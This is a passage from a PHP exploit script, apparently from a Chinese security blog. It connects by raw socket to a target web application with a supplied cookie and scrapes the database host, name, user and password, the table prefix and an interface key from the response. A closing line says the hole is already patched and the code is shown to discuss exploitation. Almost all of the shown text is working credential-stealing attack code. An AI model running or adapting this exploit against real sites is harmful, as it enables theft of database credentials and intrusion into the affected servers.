; $message.="Host: $host"; $message.="Cookie: $cookie"; $message.="Connection: Close"; $fd = fsockopen($host,\'80\'); if(!$fd) { echo \'[~]No response from\'.$host; die; } fputs($fd,$message); $resp = \'\'; while (!feof($fd)) { $resp.=fgets($fd); } fclose($fd); preg_match(\'/id="dbhost" value="(.*)"( size)/\',$resp,$dbhost); preg_match(\'/id="dbname" value="(.*)"( size)/\',$resp,$dbname); preg_match(\'/id="dbuser" value="(.*)"( size)/\',$resp,$dbuser); preg_match(\'/id="dbpw" value="(.*)"( size)/\',$resp,$dbpw); preg_match(\'/id="tablepre" value="(.*)"( size)/\',$resp,$tablepre); preg_match(\'/id="password_key" size="20" value="(.*)"//\',$resp,$password_key); if($dbhost[1]&$dbname[1]&$dbuser[1]) print_r(" [+]get the config! :) [+]数据库服务器:$dbhost[1] [+]数据库名称:$dbname[1] [+]数据库帐号:$dbuser[1] [+]数据库密码:$dbpw[1] [+]数据库表前缀:$tablepre[1] [+]接口密钥:$password_key[1] "); else die(\'[~]exploited fail :(\'); ?> 这个漏洞已经修补过一段时间了,这里写出来只是讨论一些利用的思路,如果你还有更好的利用方式,欢迎和我交流。